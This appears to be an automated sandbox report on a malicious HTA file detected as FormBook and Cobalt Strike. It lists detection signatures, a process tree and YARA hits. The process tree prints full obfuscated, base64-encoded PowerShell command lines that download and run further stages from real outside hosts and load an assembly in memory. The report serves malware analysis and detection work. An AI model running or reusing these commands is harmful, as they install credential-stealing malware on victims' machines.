Windows
Analysis Report
maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
Overview
General Information
Detection
Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 5440 cmdline:
mshta.exe "C:\Users\user\Desktop\maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 4460 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwERs HELL.exE -Ex bYPAss -nOP -w 1 -C De viceCREdEn tiAldEPloY mENT ; Inv oKE-eXPRES Sion($(inv okE-EXpRes sion('[SYS TeM.Text.E ncodInG]'+ [ChAr]58+[ chaR]0x3A+ 'utF8.geTs TRinG([sys tEM.coNvER t]'+[CHAR] 0X3A+[ChaR ]58+'FroMB aSe64sTRiN g('+[chAr] 34+'JGhvNG JXICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICA9ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBB ZGQtdHlwRS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLW1FbUJF cmRlRmlOaV RpT04gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICdb RGxsSW1wb3 J0KCJ1ckxt T04uZGxMIi wgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IFFtUWgsc3 RyaW5nICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBE LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgS0xheVVl cUplbyx1aW 50ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBkTSxJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE twQSk7JyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5BbWUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC JqempoIiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LU5BbUVTcE FDZSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgcklU U0JxeUlCIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtUGFzc1Ro cnU7ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAkaG 80Ylc6OlVS TERvd25sb2 FkVG9GaWxl KDAsImh0dH A6Ly8xNzIu MjQ1LjEyMy 4zLzc4NC92 ZXJ5Z3JlYX R0cmFmZmlj d2l0aG5pY2 V3b3JraW5n c2tpbGx0b2 JlZ29vZC50 SUYiLCIkRW 52OkFQUERB VEFcdmVyeW dyZWF0dHJh ZmZpY3dpdG huaWNld29y a2luZ3NraW xsdG9iZWdv LnZiUyIsMC wwKTtzVEFy dC1TTGVlcC gzKTtJaSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IiRFblY6QV BQREFUQVx2 ZXJ5Z3JlYX R0cmFmZmlj d2l0aG5pY2 V3b3JraW5n c2tpbGx0b2 JlZ28udmJT Ig=='+[CHA R]34+'))') ))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6596 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2872 cmdline:
POwERsHELL .exE -Ex bYPAss -nOP -w 1 -C Devic eCREdEntiA ldEPloYmEN T ; InvoKE -eXPRESSio n($(invokE -EXpRessio n('[SYSTeM .Text.Enco dInG]'+[Ch Ar]58+[cha R]0x3A+'ut F8.geTsTRi nG([systEM .coNvERt]' +[CHAR]0X3 A+[ChaR]58 +'FroMBaSe 64sTRiNg(' +[chAr]34+ 'JGhvNGJXI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBBZGQ tdHlwRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL W1FbUJFcmR lRmlOaVRpT 04gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICdbRGx sSW1wb3J0K CJ1ckxtT04 uZGxMIiwgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI ENoYXJTZXQ gPSBDaGFyU 2V0LlVuaWN vZGUpXXB1Y mxpYyBzdGF 0aWMgZXh0Z XJuIEludFB 0ciBVUkxEb 3dubG9hZFR vRmlsZShJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIFF tUWgsc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBELHN 0cmluZyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgS 0xheVVlcUp lbyx1aW50I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBkTSxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIEtwQ Sk7JyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 BbWUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICJqe mpoIiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 BbUVTcEFDZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgcklUU0J xeUlCICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtU GFzc1RocnU 7ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAkaG80Y lc6OlVSTER vd25sb2FkV G9GaWxlKDA sImh0dHA6L y8xNzIuMjQ 1LjEyMy4zL zc4NC92ZXJ 5Z3JlYXR0c mFmZmljd2l 0aG5pY2V3b 3JraW5nc2t pbGx0b2JlZ 29vZC50SUY iLCIkRW52O kFQUERBVEF cdmVyeWdyZ WF0dHJhZmZ pY3dpdGhua WNld29ya2l uZ3NraWxsd G9iZWdvLnZ iUyIsMCwwK TtzVEFydC1 TTGVlcCgzK TtJaSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIiR FblY6QVBQR EFUQVx2ZXJ 5Z3JlYXR0c mFmZmljd2l 0aG5pY2V3b 3JraW5nc2t pbGx0b2JlZ 28udmJTIg= ='+[CHAR]3 4+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 1492 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 3472 cmdline:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 3360 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 5988 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $olhento = 'JGNoYXJj byA9ICdodH RwczovL3Jl cy5jbG91ZG luYXJ5LmNv bS9keXRmbH Q2MW4vaW1h Z2UvdXBsb2 FkL3YxNzMz MTM0OTQ3L2 JrbHB5c2V5 ZXV0NGltcH c1MG4xLmpw ZyAnOyRjb2 1wb3NpdGl2 byA9IE5ldy 1PYmplY3Qg U3lzdGVtLk 5ldC5XZWJD bGllbnQ7JG Fydm9yaWZv cm1lID0gJG NvbXBvc2l0 aXZvLkRvd2 5sb2FkRGF0 YSgkY2hhcm NvKTskcHJv bWV0ZWRvci A9IFtTeXN0 ZW0uVGV4dC 5FbmNvZGlu Z106OlVURj guR2V0U3Ry aW5nKCRhcn Zvcmlmb3Jt ZSk7JGZ1c2 NpdGUgPSAn PDxCQVNFNj RfU1RBUlQ+ Pic7JHRhdm lsYSA9ICc8 PEJBU0U2NF 9FTkQ+Pic7 JG1pbmlzdG VyaWFsbWVu dGUgPSAkcH JvbWV0ZWRv ci5JbmRleE 9mKCRmdXNj aXRlKTskZG VzY3J1emFy ID0gJHByb2 1ldGVkb3Iu SW5kZXhPZi gkdGF2aWxh KTskbWluaX N0ZXJpYWxt ZW50ZSAtZ2 UgMCAtYW5k ICRkZXNjcn V6YXIgLWd0 ICRtaW5pc3 RlcmlhbG1l bnRlOyRtaW 5pc3Rlcmlh bG1lbnRlIC s9ICRmdXNj aXRlLkxlbm d0aDskZG9p ZGVqYW50ZS A9ICRkZXNj cnV6YXIgLS AkbWluaXN0 ZXJpYWxtZW 50ZTskY2Fz Y2V0YSA9IC Rwcm9tZXRl ZG9yLlN1Yn N0cmluZygk bWluaXN0ZX JpYWxtZW50 ZSwgJGRvaW RlamFudGUp OyR0cmljaG luYWRvID0g LWpvaW4gKC RjYXNjZXRh LlRvQ2hhck FycmF5KCkg fCBGb3JFYW NoLU9iamVj dCB7ICRfIH 0pWy0xLi4t KCRjYXNjZX RhLkxlbmd0 aCldOyR0cm VzY2FsYW50 ZSA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coJHRyaWNo aW5hZG8pOy RkaWFsZWN0 byA9IFtTeX N0ZW0uUmVm bGVjdGlvbi 5Bc3NlbWJs eV06OkxvYW QoJHRyZXNj YWxhbnRlKT skbW9zbGVt aXRhID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZCgnVkFJJy k7JG1vc2xl bWl0YS5Jbn Zva2UoJG51 bGwsIEAoJ3 R4dC5NQVJS TUFDLzQ4Ny 8zLjMyMS41 NDIuMjcxLy 86cHR0aCcs ICckbW92ZW RvcicsICck bW92ZWRvci csICckbW92 ZWRvcicsIC dhc3BuZXRf Y29tcGlsZX InLCAnJG1v dmVkb3InLC AnJG1vdmVk b3InLCckbW 92ZWRvcics JyRtb3ZlZG 9yJywnJG1v dmVkb3InLC ckbW92ZWRv cicsJyRtb3 ZlZG9yJywn MScsJyRtb3 ZlZG9yJykp Ow==';$ame nista = [S ystem.Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g($olhento ));Invoke- Expression $amenista MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5800 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - aspnet_compiler.exe (PID: 2720 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2) - lSomfUdjbC.exe (PID: 3992 cmdline:
"C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) - ieUnatt.exe (PID: 3360 cmdline:
"C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E) - firefox.exe (PID: 5668 cmdline:
"C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Windows_Trojan_Formbook_1112e116 | unknown | unknown | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Windows_Trojan_Formbook_1112e116 | unknown | unknown | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Windows_Trojan_Formbook_1112e116 | unknown | unknown | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Windows_Trojan_Formbook_1112e116 | unknown | unknown | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | | |
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |